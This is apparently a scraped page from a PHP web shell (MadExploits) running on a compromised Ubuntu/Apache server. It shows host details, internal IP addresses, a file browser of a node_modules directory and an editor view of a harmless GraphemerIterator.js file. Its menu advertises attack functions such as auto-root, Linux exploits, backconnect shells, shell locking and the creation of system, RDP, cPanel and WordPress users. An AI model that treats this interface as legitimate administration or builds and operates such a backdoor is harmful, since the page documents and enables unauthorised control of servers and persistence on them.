Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
graphemer /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
Graphemer.d.ts
1.36
KB
-rw-rw-r--
Graphemer.d.ts.map
575
B
-rw-rw-r--
Graphemer.js
767.59
KB
-rw-rw-r--
GraphemerHelper.d.ts
1.23
KB
-rw-rw-r--
GraphemerHelper.d.ts.map
520
B
-rw-rw-r--
GraphemerHelper.js
6.53
KB
-rw-rw-r--
GraphemerIterator.d.ts
610
B
-rw-rw-r--
GraphemerIterator.d.ts.map
424
B
-rw-rw-r--
GraphemerIterator.js
1.05
KB
-rw-rw-r--
boundaries.d.ts
1005
B
-rw-rw-r--
boundaries.d.ts.map
471
B
-rw-rw-r--
boundaries.js
1.91
KB
-rw-rw-r--
index.d.ts
98
B
-rw-rw-r--
index.d.ts.map
154
B
-rw-rw-r--
index.js
316
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : GraphemerIterator.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); /** * GraphemerIterator * * Takes a string and a "BreakHandler" method during initialisation * and creates an iterable object that returns individual graphemes. * * @param str {string} * @return GraphemerIterator */ class GraphemerIterator { constructor(str, nextBreak) { this._index = 0; this._str = str; this._nextBreak = nextBreak; } [Symbol.iterator]() { return this; } next() { let brk; if ((brk = this._nextBreak(this._str, this._index)) < this._str.length) { const value = this._str.slice(this._index, brk); this._index = brk; return { value: value, done: false }; } if (this._index < this._str.length) { const value = this._str.slice(this._index); this._index = this._str.length; return { value: value, done: false }; } return { value: undefined, done: true }; } } exports.default = GraphemerIterator;
Close